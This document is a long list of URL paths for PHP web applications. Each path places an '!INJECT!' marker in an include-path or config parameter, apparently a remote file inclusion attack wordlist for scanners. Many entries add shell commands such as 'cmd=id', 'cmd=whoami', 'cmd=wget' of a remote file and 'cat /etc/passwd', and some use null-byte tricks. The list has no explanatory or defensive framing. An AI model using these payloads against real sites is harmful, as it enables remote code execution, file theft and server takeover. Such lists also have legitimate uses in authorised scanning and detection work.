/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=!INJECT!?
/creat_news_all.php?language=!INJECT!
/create_file.php?target=!INJECT!?
/cron.php?ROOT_PATH=!INJECT!
/cron.php?include_path=!INJECT!?
/crontab/run_billing.php?config[include_dir]=!INJECT!?
/cross.php?url=!INJECT!
/custom_vars.php?sys[path_addon]=!INJECT!
/customer/product.php?xcart_dir=!INJECT!
/cwb/comanda.php?INCLUDE_PATH=!INJECT!?
/datei.php?config[root_ordner]=!INJECT!?&cmd=id
/db/PollDB.php?CONFIG_DATAREADERWRITER=!INJECT!?
/db/mysql/db.inc.php?SPL_CFG[dirroot]=!INJECT!?
/dbcommon/include.php?_APP_RELATIVE_PATH=!INJECT!
/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=!INJECT!
/debugger.php?config_atkroot=!INJECT!
/decoder/gallery.php?ccms_library_path=!INJECT!
/decoder/markdown.php?ccms_library_path=!INJECT!
/defaults_setup.php?ROOT_PATH=!INJECT!?cmd=ls
/defines.php?WEBCHATPATH=!INJECT!?
/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=!INJECT!&
/depouilg.php3?NomVote=!INJECT!?
/development.php?root_prefix=!INJECT!?
/dfcode.php?DFORUM_PATH=!INJECT!?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=!INJECT!?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=!INJECT!?
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!?
/dialog.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/dialogs/a.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/collorpicker.php?spaw_dir=!INJECT!&cmd=id
/dialogs/img.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/img_library.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/table.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/td.php?spaw_dir=!INJECT!?&cmd=id
/digitaleye_Path/module.php?menu=!INJECT!?
/dir/prepend.php?_PX_config[manager_path]=!INJECT!
/dir_thatware/config.php?root_path=!INJECT!'
/direct.php?rf=!INJECT!
/direction/index.php?repertoire_config=!INJECT!
/directory/index.php?path=!INJECT!
/display.php?pag=!INJECT!
/display.php?path=!INJECT!
/displayCategory.php?basepath=!INJECT!
/dix.php3?url_phpartenaire=!INJECT!
/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
/doc/admin/index.php?ptinclude=!INJECT!
/doceboCore/lib/lib.php?GLOBALS[where_framework]=!INJECT!
/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=!INJECT!
/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=!INJECT!
/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=!INJECT!
/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=!INJECT!
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=!INJECT!
/docs/front-end-demo/cart2.php?workdir=!INJECT!?
/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=!INJECT!?&cmd=wget%20!INJECT!
/dosearch.php?RESPATH=!INJECT!
/download.php?root_prefix=!INJECT!?
/download_engine_V1.4.3/addmember.php?eng_dir=!INJECT!
/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=!INJECT!
/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=!INJECT!
/downstat1.8/chart.php?art=!INJECT!?
/dp_logs.php?HomeDir=!INJECT!
/eXPerience2/modules.php?file=!INJECT!
/ea-gBook/index_inc.php?inc_ordner=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/edit.php?javascript_path=!INJECT!?
/editor.php?newsfile=!INJECT!
/editprofile.php?pathtohomedir=!INJECT!?
/editsite.php?returnpath=!INJECT!
/editx/add_address.php?include_dir=!INJECT!
/elseif/contenus.php?contenus=!INJECT!
/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=!INJECT!
/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=!INJECT!
/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=!INJECT!
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=!INJECT!
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign!INJECT!
/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=!INJECT!
/email_subscribe.php?root_prefix=!INJECT!?
/embed/day.php?path=!INJECT!
/enc/content.php?Home_Path=!INJECT!?
/engine/Ajax/editnews.php?root_dir=!INJECT!
/engine/api/api.class.php?dle_config_api=!INJECT!?
/engine/engine.inc.php?absolute_path=!INJECT!
/engine/init.php?root_dir=!INJECT!
/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=!INJECT!?
/enth3/show_joined.php?path=!INJECT!
/environment.php?DIR_PREFIX=!INJECT!
/epal/index.php?view=!INJECT!?
/errors.php?error=!INJECT!
/errors/configmode.php?GALLERY_BASEDIR=!INJECT!
/errors/needinit.php?GALLERY_BASEDIR=!INJECT!
/errors/reconfigure.php?GALLERY_BASEDIR=!INJECT!
/errors/unconfigured.php?GALLERY_BASEDIR=!INJECT!
/es_custom_menu.php?files_dir=!INJECT!
/es_desp.php?files_dir=!INJECT!
/es_offer.php?files_dir=!INJECT!
/eshow.php?Config_rootdir=!INJECT!
/esupport/admin/autoclose.php?subd=!INJECT!?
/eva/index.php3?aide=!INJECT!?
/eva/index.php3?perso=!INJECT!
/eva/index.php?eva[caminho]=!INJECT!
/event.php?myevent_path=!INJECT!
/event_cal/module/embed/day.php?path=!INJECT!
/eventcal2.php.php?path_simpnews=!INJECT!
/eventscroller.php?path_simpnews=!INJECT!
/example-view/templates/article.php?globals[content_dir]=!INJECT!?
/example-view/templates/dates_list.php?globals[content_dir]=!INJECT!?
/example-view/templates/root.php?globals[content_dir]=!INJECT!?
/example.php?site=!INJECT!
/example/gamedemo/inc.functions.php?projectPath=!INJECT!?
/examplefile.php?bibtexrootrel=!INJECT!?
/examples/patExampleGen/bbcodeSource.php?example=!INJECT!
/exception/include.php?_APP_RELATIVE_PATH=!INJECT!
/extauth/drivers/ldap.inc.php?clarolineRepositorySys=!INJECT!
/extras/mt.php?web_root=!INJECT!
/extras/poll/poll.php?file_newsportal=!INJECT!
/ezusermanager_pwd_forgott.php?ezUserManager_Path=!INJECT!
/faq.php?module_root_path=!INJECT!
/faq.php?phpbb_root_path=!INJECT!
/fckeditor/editor/dialog/fck_link.php?dirroot=!INJECT!
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=!INJECT!
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=!INJECT!?&cmd=id
/fcring.php?s_fuss=!INJECT!
/feed.php?config[root_ordner]=!INJECT!?&cmd=id
/feed/index2.php?m=!INJECT!
/files/amazon-bestsellers.php?CarpPath=!INJECT!
/files/carprss.php?CarpPath=!INJECT!
/files/compose-attach.php3?BSX_LIBDIR=!INJECT!
/files/compose-menu.php3?BSX_LIBDIR=!INJECT!
/files/compose-new.php3?BSX_LIBDIR=!INJECT!
/files/compose-send.php3?BSX_LIBDIR=!INJECT!
/files/folder-create.php3?BSX_LIBDIR=!INJECT!
/files/folder-delete.php3?BSX_LIBDIR=!INJECT!
/files/folder-empty.php3?BSX_LIBDIR=!INJECT!
/files/folder-rename.php3?BSX_LIBDIR=!INJECT!
/files/folders.php3?BSX_LIBDIR=!INJECT!
/files/login.php3?err=hack&BSX_HTXDIR=!INJECT!
/files/mainfile.php?page[path]=!INJECT!?&cmd=ls
/files/mbox-list.php3?BSX_LIBDIR=!INJECT!
/files/message-delete.php3?BSX_LIBDIR=!INJECT!
/files/message-forward.php3?BSX_LIBDIR=!INJECT!
/files/message-header.php3?BSX_LIBDIR=!INJECT!
/files/message-print.php3?BSX_LIBDIR=!INJECT!
/files/message-read.php3?BSX_LIBDIR=!INJECT!
/files/message-reply.php3?BSX_LIBDIR=!INJECT!
/files/message-replyall.php3?BSX_LIBDIR=!INJECT!
/files/message-search.php3?BSX_LIBDIR=!INJECT!
/findix/index.php?page=!INJECT!?&cmd=id
/fishcart_v3/fc_functions/fc_example.php?docroot=!INJECT!
/flushcmd/Include/editor/rich_files/class.rich.php?class_path=!INJECT!?
/fonctions/template.php?repphp=!INJECT!?
/fonctions_racine.php?chemin_lib=!INJECT!
/footer.inc.php?settings[footer]=!INJECT!
/footer.inc.php?tfooter=!INJECT!?
/footer.php?footer_file=!INJECT!
/footer.php?op[footer_body]=!INJECT!?
/form.php?path=!INJECT!?&cmd=pwd
/forum.php?cfg_file=1&fpath=!INJECT!?
/forum/forum.php?view=!INJECT!
/forum/forum82lib.php3?repertorylevel=!INJECT!?
/forum/gesfil.php?repertorylevel=!INJECT!?
/forum/lostpassword.php?repertorylevel=!INJECT!?
/forum/mail.php?repertorylevel=!INJECT!?
/forum/member.php?repertorylevel=!INJECT!?
/forum/message.php?repertorylevel=!INJECT!?
/forum/search.php?repertorylevel=!INJECT!?
/forum/track.php?path=!INJECT!
/frame.php?framefile=!INJECT!
/ftp.php?path_local=!INJECT!
/function.inc.php?path=!INJECT!
/function.php?adminfolder=!INJECT!
/function.php?gbpfad=!INJECT!
/functions.php?include_path=!INJECT!
/functions.php?pmp_rel_path=!INJECT!
/functions.php?s[phppath]=!INJECT!
/functions.php?set_path=!INJECT!?
/functions/form.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/general.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/groups.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/js.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/prepend_adm.php?SETS[path][physical]=!INJECT!
/functions/prepend_adm.php?SETS[path][physical]=!INJECT!?
/functions/sections.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/users.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions_mod_user.php?phpbb_root_path=!INJECT!?&cmd=ls
/fusebox5.php?FUSEBOX_APPLICATION_PATH=!INJECT!
/galerie.php?config[root_ordner]=!INJECT!?cmd=id
/gallery/captionator.php?GALLERY_BASEDIR=!INJECT!
/gallery/lib/content.php?include=!INJECT!?cmd=ls
/gallery/theme/include_mode/template.php?galleryfilesdir=!INJECT!
/gallerypath/index.php?includepath=!INJECT!
/games.php?id=!INJECT!
/games.php?scoreid=!INJECT!
/gbook/includes/header.php?abspath=!INJECT!?
/gemini/page/forums/bottom.php?lang=!INJECT!?
/gen_m3u.php?phpbb_root_path=!INJECT!
/genepi.php?topdir=!INJECT!
/generate.php?ht_pfad=!INJECT!?
/gepi/gestion/savebackup.php?filename=!INJECT!&cmd=cat/etc/passwd
/gestArt/aide.php3?aide=!INJECT!?
/get_session_vars.php?path_to_smf=!INJECT!
/getpage.php?page=online&doc_path=!INJECT!
/global.php?abs_path=!INJECT!?
/gorum/dbproperty.php?appDirName=!INJECT!
/gpb/include/db.mysql.inc.php?root_path=!INJECT!?
/gpb/include/gpb.inc.php?root_path=!INJECT!?
/graph.php?DOCUMENT_ROOT=!INJECT!?
/gruppen.php?config[root_ordner]=!INJECT!?&cmd=id
/handlers/email/mod.listmail.php?_PM_[path][handle]=!INJECT!
/handlers/page/show.php?sous_rep=!INJECT!
/head.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/header.inc.php?CssFile=!INJECT!
/header.php?path=!INJECT!
/header.php?wwwRoot=!INJECT!
/help.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/help/index.php?show=!INJECT!
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
/helperfunction.php?includedir=!INJECT!
/hioxBannerRotate.php?hm=!INJECT!
/hioxRandomAd.php?hm=!INJECT!
/hioxstats.php?hm=!INJECT!
/hioxupdate.php?hm=!INJECT!
/home.php?a=!INJECT!
/home.php?page=!INJECT!
/home.php?pagina=!INJECT!
/home/www/images/doc/index2.php?type=!INJECT!
/home1.php?ln=!INJECT!
/home2.php?ln=!INJECT!
/hsList.php?subdir=!INJECT!?&cmd=ls
/htdocs/gmapfactory/params.php?gszAppPath=!INJECT!
/html/admin/modules/plugin_admin.php?_settings[pluginpath]=!INJECT!
/hu/modules/reg-new/modstart.php?mod_dir=!INJECT!?
/i_head.php?home=!INJECT!
/i_nav.php?home=!INJECT!
/iframe.php?file=!INJECT!
/image.php?url=!INJECT!???
/impex/ImpExData.php?systempath=!INJECT!
/import.php?bibtexrootrel=!INJECT!?
/importinfo.php?bibtexrootrel=!INJECT!?
/in.php?returnpath=!INJECT!
/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=!INJECT!
/inc/config.inc.php?x[1]=!INJECT!
/inc/design.inc.php?dir[data]=!INJECT!
/inc/download_center_lite.inc.php?script_root=!INJECT!
/inc/formmail.inc.php?script_root=!INJECT!
/inc/gabarits.php?cfg_racine=!INJECT!
/inc/header.inc.php?ficStyle=!INJECT!
/inc/ifunctions.php?GLOBALS[phpQRootDir]=!INJECT!
/inc/inc.php?cfg_racine=!INJECT!?
/inc/indexhead.php?fileloc=!INJECT!?
/inc/irayofuncs.php?irayodirhack=!INJECT!?
/inc/libs/Smarty_Compiler.class.php?plugin_file=!INJECT!?
/inc/libs/core/core.display_debug_console.php?plugin_file=!INJECT!?
/inc/libs/core/core.load_plugins.php?plugin_file=!INJECT!?
/inc/libs/core/core.load_resource_plugin.php?plugin_file=!INJECT!?
/inc/libs/core/core.process_cached_inserts.php?plugin_file=!INJECT!?
/inc/libs/core/core.process_compiled_include.php?plugin_file=!INJECT!?
/inc/libs/core/core.read_cache_file.php?plugin_file=!INJECT!?
/inc/linkbar.php?cfile=!INJECT!?
/inc/login.php?pathCGX=!INJECT!
/inc/logingecon.php?pathCGX=!INJECT!
/inc/ltdialogo.php?pathCGX=!INJECT!
/inc/mtdialogo.php?pathCGX=!INJECT!
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=!INJECT!?
/inc/prepend.inc.php?path=!INJECT!?
/inc/service.alert.inc.php?SPL_CFG[dirroot]=!INJECT!?
/inc/settings.php?inc_dir=!INJECT!
/inc/settings.ses.php?SPL_CFG[dirroot]=!INJECT!?
/inc/shows.inc.php?cutepath=!INJECT!?
/inc/sige_init.php?SYS_PATH=!INJECT!?
/inc_group.php?include_path=!INJECT!?
/inc_manager.php?include_path=!INJECT!?
/inc_newgroup.php.php?include_path=!INJECT!?
/inc_smb_conf.php?include_path=!INJECT!?
/inc_user.php?include_path=!INJECT!?
/include.php?_APP_RELATIVE_PATH=!INJECT!
/include.php?gorumDir=!INJECT!
/include.php?myng_root=!INJECT!
/include.php?path=psp/user.php&site=!INJECT!
/include.php?path[docroot]=!INJECT!
/include.php?sunPath=!INJECT!
/include/Beautifier/Core.php?BEAUT_PATH=!INJECT!
/include/HTML_oben.php?include_path=!INJECT!
/include/HTML_oben.php?include_path=!INJECT!?
/include/SQuery/gameSpy2.php?libpath=!INJECT!
/include/bbs.lib.inc.php?site_path=!INJECT!
/include/class_yapbbcooker.php?cfgIncludeDirectory=!INJECT!
/include/classes.php?INCLUDE_DIR=!INJECT!?
/include/client.php?INCLUDE_DIR=!INJECT!?
/include/cls_headline_prod.php?INCLUDE_PATH=!INJECT!
/include/cls_listorders.php?INCLUDE_PATH=!INJECT!
/include/cls_viewpastorders.php?INCLUDE_PATH=!INJECT!
/include/common.php?XOOPS_ROOT_PATH=!INJECT!
/include/common_functions.php?baros_path=!INJECT!?
/include/config.inc.php?racine=!INJECT!
/include/copyright.php?tsep_config[absPath]=!INJECT!?cmd=ls
/include/customize.php?l=!INJECT!&text=Hello%20World
/include/default_header.php?script_path=!INJECT!
/include/define.php?INC_DIR=!INJECT!?
/include/disp_form.php3?cfg_include_dir=!INJECT!?
/include/disp_smileys.php3?cfg_include_dir=!INJECT!?
/include/dom.php?path=!INJECT!
/include/dtd.php?path=!INJECT!
/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=!INJECT!?
/include/engine/content/elements/menu.php?CONFIG[AdminPath]=!INJECT!
/include/forms.php?INCLUDE_DIR=!INJECT!?
/include/global.php?pfad=!INJECT!
/include/header.php?cs_base_path=!INJECT!?
/include/html/nettools.popup.php?DIR=!INJECT!
/include/inc.foot.php?root=!INJECT!
/include/inc_ext/spaw/dialogs/table.php?spaw_root=!INJECT!
/include/inc_freigabe.php?include_path=!INJECT!?
/include/inc_freigabe1.php?include_path=!INJECT!?
/include/inc_freigabe3.php?include_path=!INJECT!?
/include/include_stream.inc.php?include_path=!INJECT!
/include/include_top.php?g_include=!INJECT!
/include/includes.php?include_path=!INJECT!
/include/index.php3?cfg_include_dir=!INJECT!?
/include/init.inc.php?G_PATH=!INJECT!
/include/issue_edit.php?INCLUDE_DIR=!INJECT!?
/include/lib/lib_slots.php?main_path=!INJECT!
/include/lib/lib_stats.php?main_path=!INJECT!?
/include/lib/lib_users.php?main_path=!INJECT!?
/include/little_news.php3?cfg_include_dir=!INJECT!?
/include/livre_include.php?no_connect=lol&chem_absolu=!INJECT!?
/include/loading.php?path_include=!INJECT!
/include/mail.inc.php?root=!INJECT!
/include/menu_builder.php?config[page_dir]=!INJECT!?
/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=!INJECT!
/include/monitoring/engine/MakeXML.php?fileOreonConf=!INJECT!?
/include/parser.php?path=!INJECT!
/include/pear/IT.php?basepath=!INJECT!?
/include/pear/ITX.php?basepath=!INJECT!?
/include/pear/IT_Error.php?basepath=!INJECT!?
/include/phpxd/phpXD.php?appconf[rootpath]=!INJECT!?&cmd=id
/include/prodler.class.php?sPath=!INJECT!???
/include/scripts/export_batch.inc.php?DIR=!INJECT!
/include/scripts/run_auto_suspend.cron.php?DIR=!INJECT!
/include/scripts/send_email_cache.php?DIR=!INJECT!
/include/startup.inc.php?root_path=!INJECT!?
/include/themes/themefunc.php?myNewsConf[path][sys][index]=!INJECT!?
/include/timesheet.php?config[include_dir]=!INJECT!
/include/urights.php?CRM_inc=!INJECT!
/includes/admin_board2.php?phpbb_root_path=!INJECT!?ls
/includes/admin_logger.php?phpbb_root_path=!INJECT!?ls
/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=!INJECT!?
/includes/ajax_listado.php?urlModulo=!INJECT!
/includes/archive/archive_topic.php?phpbb_root_path=!INJECT!?
/includes/bbcb_mg.php?phpbb_root_path=!INJECT!?
/includes/begin.inc.php?PagePrefix=!INJECT!
/includes/blogger.php?path_prefix=!INJECT!
/includes/class/class_tpl.php?cache_file=!INJECT!?
/includes/class_template.php?quezza_root_path=!INJECT!
/includes/classes/pctemplate.php?pcConfig[smartyPath]=!INJECT!?cmd
/includes/common.inc.php?CONFIG[BASE_PATH]=!INJECT!
/includes/common.php?module_root_path=!INJECT!?
/includes/common.php?root=!INJECT!?
/includes/common.php?root_path=!INJECT!?
/includes/config.inc.php?racineTBS=!INJECT!
/includes/config/master.inc.php?fm_data[root]=!INJECT!?
/includes/connection.inc.php?PagePrefix=!INJECT!
/includes/dbal.php?eqdkp_root_path=!INJECT!
/includes/events.inc.php?PagePrefix=!INJECT!
/includes/footer.html.inc.php?tc_config[app_root]=!INJECT!?
/includes/footer.inc.php?PagePrefix=!INJECT!
/includes/footer.php?PHPGREETZ_INCLUDE_DIR=!INJECT!
/includes/functions.inc.php?sitepath=!INJECT!?
/includes/functions.php?location=!INJECT!
/includes/functions.php?phpbb_root_path=!INJECT!
/includes/functions.php?phpbb_root_path=!INJECT!?
/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
/includes/functions/html_generate.php?path_prefix=!INJECT!
/includes/functions/master.inc.php?fm_data[root]=!INJECT!?
/includes/functions/validations.php?path_prefix=!INJECT!
/includes/functions_admin.php?phpbb_root_path=!INJECT!?
/includes/functions_install.php?vwar_root=!INJECT!
/includes/functions_kb.php?phpbb_root_path=!INJECT!?
/includes/functions_mod_user.php?phpbb_root_path=!INJECT!?
/includes/functions_portal.php?phpbb_root_path=!INJECT!?
/includes/functions_user_viewed_posts.php?phpbb_root_path=!INJECT!?
/includes/global.php?nbs=!INJECT!?
/includes/header.inc.php?PagePrefix=!INJECT!
/includes/header.inc.php?dateiPfad=!INJECT!
/includes/include_once.php?include_file=!INJECT!
/includes/init.php?includepath=!INJECT!?
/includes/iplogger.php?phpbb_root_path=!INJECT!?ls
/includes/kb_constants.php?module_root_path=!INJECT!
/includes/lang/language.php?path_to_root=!INJECT!
/includes/lib-account.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-group.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-log.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-themes.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/logger_engine.php?phpbb_root_path=!INJECT!
/includes/menuleft.inc.php?PagePrefix=!INJECT!
/includes/mkb.php?phpbb_root_path=!INJECT!?ls
/includes/morcegoCMS/adodb/adodb.inc.php?path=!INJECT!
/includes/morcegoCMS/morcegoCMS.php?fichero=!INJECT!
/includes/mx_common.php?module_root_path=!INJECT!?
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=!INJECT!
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=!INJECT!
/includes/pafiledb_constants.php?module_root_path=!INJECT!
/includes/pages.inc.php?PagePrefix=!INJECT!
/includes/phpdig/includes/config.php?relative_script_path=!INJECT!
/includes/profilcp_constants.php?module_root_path=!INJECT!?
/includes/settings.inc.php?approot=!INJECT!
/includes/template.php?myevent_path=!INJECT!
/includes/themen_portal_mitte.php?phpbb_root_path=!INJECT!
/includes/tumbnail.php?config[root_ordner]=!INJECT!?
/includes/usercp_register.php?phpbb_root_path=!INJECT!?
/includes/usercp_viewprofile.php?phpbb_root_path=!INJECT!?
/includes/xhtml.php?d_root=!INJECT!?
/index.php3?Application_Root=!INJECT!
/index.php?1=lol&PAGES[lol]=!INJECT!
/index.php?AML_opensite=!INJECT!
/index.php?AMV_openconfig=1&AMV_serverpath=!INJECT!
/index.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/index.php?ConfigDir=!INJECT!
/index.php?DIR_PLUGINS=!INJECT!
/index.php?G_JGALL[inc_path]=!INJECT!%00
/index.php?HomeDir=!INJECT!
/index.php?Lang=AR&Page=!INJECT!
/index.php?Madoa=!INJECT!?
/index.php?RP_PATH=!INJECT!
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
/index.php?abg_path=!INJECT!?
/index.php?abs_path=!INJECT!?
/index.php?adduser=true&lang=!INJECT!
/index.php?adodb=!INJECT!
/index.php?ads_file=!INJECT!
/index.php?arquivo=!INJECT!
/index.php?back=!INJECT!
/index.php?base==!INJECT!
/index.php?basePath=!INJECT!
/index.php?bibtexrootrel=!INJECT!?
/index.php?blog_dc_path=!INJECT!
/index.php?blog_theme=!INJECT!
/index.php?body=!INJECT!
/index.php?class_path=!INJECT!?
/index.php?classified_path=!INJECT!?
/index.php?cms=!INJECT!?
/index.php?config["sipssys"]=!INJECT!
/index.php?config[root_ordner]=!INJECT!?&cmd=id
/index.php?config[root_ordner]=!INJECT!?cmd=id
/index.php?config_atkroot=!INJECT!
/index.php?configuration=!INJECT!
/index.php?custom_admin_path=!INJECT!?
/index.php?dateiPfad=!INJECT!?&cmd=ls
/index.php?de=!INJECT!
/index.php?dept=!INJECT!
/index.php?do=!INJECT!
/index.php?exec=!INJECT!?
/index.php?ext=!INJECT!
/index.php?faq_path=!INJECT!?&cmd=id
/index.php?file_name[]=!INJECT!?
/index.php?file_path=!INJECT!?
/index.php?fileloc=!INJECT!
/index.php?from=!INJECT!
/index.php?func=!INJECT!?
/index.php?function=!INJECT!
/index.php?function=custom&custom=!INJECT!
/index.php?gOo=!INJECT!
/index.php?gen=!INJECT!
/index.php?get=!INJECT!
/index.php?home_name=!INJECT!
/index.php?ilang=!INJECT!?
/index.php?inc_dir=!INJECT!
/index.php?inc_dir=!INJECT!?
/index.php?includeDir=!INJECT!
/index.php?includeFooter=!INJECT!
/index.php?includesdir=!INJECT!
/index.php?insPath=!INJECT!
/index.php?lang=!INJECT!
/index.php?language=!INJECT!?
/index.php?language=en&main_page=!INJECT!
/index.php?lizge=!INJECT!?&cmd=ls
/index.php?lng=!INJECT!
/index.php?load=!INJECT!
/index.php?loadpage=!INJECT!
/index.php?main_tabid=1&main_content=!INJECT!
/index.php?may=!INJECT!
/index.php?middle=!INJECT!
/index.php?mode=!INJECT!
/index.php?modpath=!INJECT!
/index.php?module=PostWrap&page=!INJECT!
/index.php?mosConfig_absolute_path=!INJECT!
/index.php?news7["functions"]=!INJECT!
/index.php?news_include_path=!INJECT!
/index.php?open=!INJECT!
/index.php?option=com_custompages&cpage=!INJECT!?
/index.php?page=!INJECT!
/index.php?page=!INJECT!%00
/index.php?page=!INJECT!?
/index.php?page!INJECT!
/index.php?page[path]=!INJECT!?&cmd=ls
/index.php?pagename=!INJECT!
/index.php?pager=!INJECT!
/index.php?pagina=!INJECT!?
/index.php?path_to_folder=!INJECT!?cmd=id
/index.php?pg=!INJECT!?
/index.php?phpbb_root_path=!INJECT!
/index.php?plugin=!INJECT!
/index.php?principal=!INJECT!
/index.php?proMod=!INJECT!
/index.php?proMod=!INJECT!?cmd
/index.php?project=!INJECT!
/index.php?repinc=!INJECT!?
/index.php?root_prefix=!INJECT!
/index.php?root_prefix=!INJECT!?
/index.php?section=!INJECT!
/index.php?site=!INJECT!
/index.php?site_path=!INJECT!
/index.php?styl[top]=!INJECT!??
/index.php?template=!INJECT!?
/index.php?templates_dir=!INJECT!?
/index.php?theme=!INJECT!
/index.php?themepath=!INJECT!?
/index.php?themesdir=!INJECT!
/index.php?this_path=!INJECT!?
/index.php?txt=!INJECT!
/index.php?up=!INJECT!
/index.php?url=!INJECT!
/index.php?w=!INJECT!
/index.php?way=!INJECT!??????????????
/index1.php?=!INJECT!
/index1.php?inc=!INJECT!
/index1.php?inhalt=!INJECT!
/index2.php?=!INJECT!
/index2.php?content=!INJECT!
/index2.php?s=!INJECT!
/index2.php?x=!INJECT!
/indexinfo.php?bibtexrootrel=!INJECT!?
/indexk.php?lib_path=!INJECT!?
/info.php?file=!INJECT!
/inhalt.php?dateien[news]=!INJECT!?
/init.php?API_HOME_DIR=!INJECT!
/init.php?scriptpath=!INJECT!?
/initialize.php?hmail_config[includepath]=!INJECT!&cmd=dir
/initiate.php?abs_path=!INJECT!
/install.php?_NE[AbsPath]=!INJECT!
/install.php?install_dir=!INJECT!
/install/config.php?path=!INJECT!
/install/di.php?pathtoserverdata=!INJECT!
/install/index.php?content_php=!INJECT!
/install/install3.php?database=none&cabsolute_path=!INJECT!
/integration/shortstat/configuration.php?SPL_CFG[dirroot]=!INJECT!?
/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=!INJECT!?
/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=!INJECT!?
/interface/billing/billing_process.php?srcdir=!INJECT!?
/interface/editors/-custom.php?bField[bf_data]=!INJECT!
/interface/editors/custom.php?bField[bf_data]=!INJECT!
/interface/new/new_patient_save.php?srcdir=!INJECT!?
/intern/admin/?rootdir=!INJECT!
/intern/admin/other/backup.php?admin=1&rootdir=!INJECT!
/intern/clan/member_add.php?rootdir=!INJECT!
/intern/config/forum.php?rootdir=!INJECT!
/intern/config/key_2.php?rootdir=!INJECT!
/ip.inc.php?type=1&cgipath=!INJECT!
/ipeer_site/?page=!INJECT!?
/joinus.php?vwar_root=!INJECT!
/joinus.php?vwar_root=!INJECT!?&cmd=ls
/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=!INJECT!?
/joomla_path/components/com_articles.php?absolute_path=!INJECT!?
/js/bbcodepress/bbcode-form.php?BBCODE_path=!INJECT!
/js/wptable-tinymce.php?ABSPATH=!INJECT!
/jscript.php?my_ms[root]=!INJECT!?
/kernel/class/ixpts.class.php?IXP_ROOT_PATH=!INJECT!
/kernel/loadkernel.php?installPath=!INJECT!
/kmitaadmin/kmitam/htmlcode.php?file=!INJECT!?
/ktmlpro/includes/ktedit/toolbar.php?dirDepth=!INJECT!
/lang/leslangues.php?fichier=!INJECT!
/lang_english/lang_main_album.php?phpbb_root_path=!INJECT!?a=
/language/lang_english/lang_activity.php?phpbb_root_path=!INJECT!
/language/lang_english/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
/language/lang_german/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
/language/lang_german/lang_main_album.php?phpbb_root_path=!INJECT!?a=
/latestposts.php?forumspath=!INJECT!
/latex.php?bibtexrootrel=!INJECT!?
/layout/default/params.php?gConf[dir][layouts]=!INJECT!?
/ldap/authldap.php?includePath=!INJECT!
/learnPath/include/scormExport.inc.php?includePath=!INJECT!
/lib.editor.inc.php?sys_path=!INJECT!?
